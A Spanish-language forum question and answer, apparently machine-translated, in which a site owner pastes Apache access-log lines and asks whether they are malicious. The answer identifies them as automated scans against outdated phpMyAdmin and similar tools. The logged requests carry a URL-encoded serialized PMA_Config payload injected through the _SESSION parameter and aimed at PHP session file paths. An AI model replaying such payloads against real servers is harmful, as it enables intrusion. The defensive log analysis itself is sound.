¿Son estas peticiones maliciosas en mi logging de acceso de apache?

Así que me di count de que mi logging de acceso de apache está lleno de estos:

180.179.206.84 - - [06/Feb/2013:14:35:45 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A46%3A%22%2Fvar%2Ftmp%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:46 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:47 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A50%3A%22%2Fvar%2Flib%2Fphp%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:47 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:48 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp4%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:48 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:49 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp5%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:50 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:50 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A58%3A%22%2Fvar%2Flib%2Fphp%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:51 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:52 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A59%3A%22%2Fvar%2Flib%2Fphp4%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:52 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:53 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A59%3A%22%2Fvar%2Flib%2Fphp5%2Fsession%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:53 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:54 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A53%3A%22%2Fshanetworking%2Fsessionssess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:55 -0500] "GET /phpmyadmin/index.php/index.php?token=a58cd3820282165c43b7443e856c2f48 HTTP/1.1" 200 8127 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 180.179.206.84 - - [06/Feb/2013:14:35:55 -0500] "GET /phpmyadmin/index.php/index.php?session_to_unset=123&token=a58cd3820282165c43b7443e856c2f48&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A55%3A%22%2Fvar%2Fphp_sessions%2Fsess_8r1hlgbmtrh26f9fnhoor7p32dgfvcfc%22%3B%7D%7D HTTP/1.1" 200 210 "http://50.116.55.81/phpmyadmin/index.php/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8" 

No parece que esa dirección realmente está haciendo algo dañino, pero parece que están intentando romper algo. Los IPs vienen de Italia y la India de todos los lugares. Observe que el User-agent es una versión antigua de Firefox (aunque sé que es fácil de spoof). Me di count de una stream constante de 20kbps de tráfico entrante a mi sitio personal (que honestamente nunca suele ver el tráfico.) Era curioso si alguien tenía alguna idea o información sobre un ataque específico que están tratando de hacer aquí. hay un montón de procedentes de diferentes lugares, así que creo que podría ser un poco inútil.

Cualquier server público verá estos bashs (y muchos, muchos más dirigidos a otro software comúnmente instalado). Son automatizados, usualmente realizados desde el extranjero / Tor / botnets, y hay suficiente gente tratando esto que bloquear IPs es esencialmente inútil.

Sí, son maliciosos, pero no, realmente no merecen la pena preocuparse.

Normalmente se dirigen a versiones antiguas de cosas como phpMyAdmin, WordPress, Drupal y otras herramientas comunes con vulnerabilidades conocidas: mantenga actualizado su código de terceros y debería estar bien.